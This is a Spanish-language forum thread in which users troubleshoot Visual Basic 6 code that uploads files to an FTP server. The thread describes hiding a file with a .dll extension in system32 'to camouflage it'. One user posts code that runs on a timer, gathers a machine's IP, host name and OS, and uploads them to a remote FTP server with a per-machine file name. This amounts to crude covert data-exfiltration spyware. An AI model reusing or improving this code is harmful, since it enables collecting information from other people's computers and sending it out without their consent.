Autor
|
Tema: Aplicacion en VB 6.0 ... subir a FTP :s (Leído 12,668 veces)
|
Manibal_man
|
y pero obvio!, le estas diciendo que suba el file "system32." ese file existe? no, entonces no va a subir nada... tenes que poner EXACTAMENTE el file que queres que suba...
|
|
|
|
:: I was born ready motha fucka ::
|
|
|
{_The_Alwar_}
Who dares win
|
Haber el "file" system32 si existe! Yo le declare anteriormente que systema32 = ruta de system32 en ese pc & "CMDLG.dll" y Si existe, es una archivo de texto que tiene extension dll para camuflarlo...
|
|
|
|
|
|
|
Manibal_man
|
ufffffffffffffff, el file system32. no existe, lo que existe es una ruta y un archifo DEFINIDOS en la varable system32, por lo tanto para que lo tome como variable y no como string tenes que poner asi Inet1.Execute "ftp://ftp.webcindario.com", "Put " & system32 & "/Alwar/CMDLG.dll" ok??, es muy facil!!! si vos pones: Inet1.Execute "ftp://ftp.webcindario.com", "Put system32 /Alwar/CMDLG.dll" le estas diciendo que suba el archivo system32. y vos queres que suba el archivo que esta definido en la VARIABLE system32 bueno, con esto tenes que entenderlo si o si Saludos
|
|
|
|
|
|
|
{_The_Alwar_}
Who dares win
|
sorry ya te entendi
|
|
|
|
|
|
|
rodimus
|
soy nuevo en esto del vb pero si he entendio algo pero acerca del ejemplo anterior de subir un archivo prueba.txt a un ftp no me sube nada ni sikierame conecta.......el kodigo k uso es este Dim ti -------------------------------------------------------------------------- Private Sub Form_Load() On Error GoTo error Form1.Visible = True ti = 0 Timer1.Interval = 100 error: End Sub -------------------------------------------------------------------------- Private Sub Command1_Click() On Error GoTo error ti = ti + 1 Label1.Caption = ti If ti = 10 Then Open "prueba.txt" For Output As #1 Print #1, "ip del host . . . . . :", Winsock1.LocalIP Print #1, "host. . . . . . . . . :", Winsock1.LocalHostName Print #1, "plataforma. . . . . . :", SysInfo1.OSPlatform Print #1, "fecha . . . . . . . . :", Date Print #1, "hora. . . . . . . . . :", Time Close #1 Inet1.URL = "ftp://MiFtp.es" Inet1.UserName = "ElUsuario" Inet1.Password = "ElPass" inet1.execute , "put c:\prueba.txt /prueba" & winsock1.localhostname & ".txt" 'para que sea diferente al ejecutarlo de diferente makina End If error: End Sub -------------------------------------------------------------------------- Private Sub Timer1_Timer() On Error GoTo error Call Command1_Click error: End Sub ahme olvidava ahi pongo un boton de command , un control timer y un label nada mas verdad o me falta alguno ????? Haber si me dan una manito graxias
|
|
« Última modificación: 2 Agosto 2005, 22:59 pm por rodimus »
|
|
|
|
|
Xpeed
Res Publica Non Dominetur
|
pero que error te da?¿ ....osea si te conecta al ftp?¿ ... o te sale que no puede subir el arxivo?¿ ....que direccion ftp estas utilizando?¿ edito: ahme olvidava ahi pongo un boton de command , un control timer y un label nada mas verdad o me falta alguno Huh?? Haber si me dan una manito graxias obviamente tienes que ponerle ademas de estos el respectivo control winsock, inet, y sysinfo un saludo.
|
|
« Última modificación: 2 Agosto 2005, 23:08 pm por $P€€D »
|
|
|
|
|
Manibal_man
|
jajaj speed, no importa que error le da...
Rodimus, creo que tendrias que leer muchisimo mas de visual... aunque sea lo minimo para entender loq ue pones en el fuente...
por ej... al poner winsock1.localip, sabes que es winsock? bueno... necesitas el control..
cuando pones Inet1.UserName, sabes que es Inet1? si!!1, adivinaste!!!, otro control!!!!
en sintesis... te recomiendo que empieces x algo mas basico que generes vos solo y que de a poco leas comandos y controles nuevos y una vez que los sepas manejar los pongas en practica
Saludos
|
|
|
|
|
|
|
{_The_Alwar_}
Who dares win
|
nose manibal_man a mi tampoco me funciona mi ejemplo he ice lo que tu me djijiste, pero el error que me da es de que no puede conectar al host
|
|
|
|
|
|
|
Xpeed
Res Publica Non Dominetur
|
intenta ponerlo asi Inet1.URL = "ftp://elFtp.es" Inet1.UserName = "ElUsuario" Inet1.Password = "ElPass" y utilizas el inet1.execute, sin direccion...solo con la istruccion a hacer......tambien prueba .. no meter el path de la aplicacion a subir en una variable....sino manejala como la direccion asi sabes si lo sube almenos un saludo
|
|
|
|
|
|
|
{_The_Alwar_}
Who dares win
|
si el error es que no conecta, no llega a subir, ya probe con lo de inet1.url y tampoco
|
|
|
|
|
|
|
|
|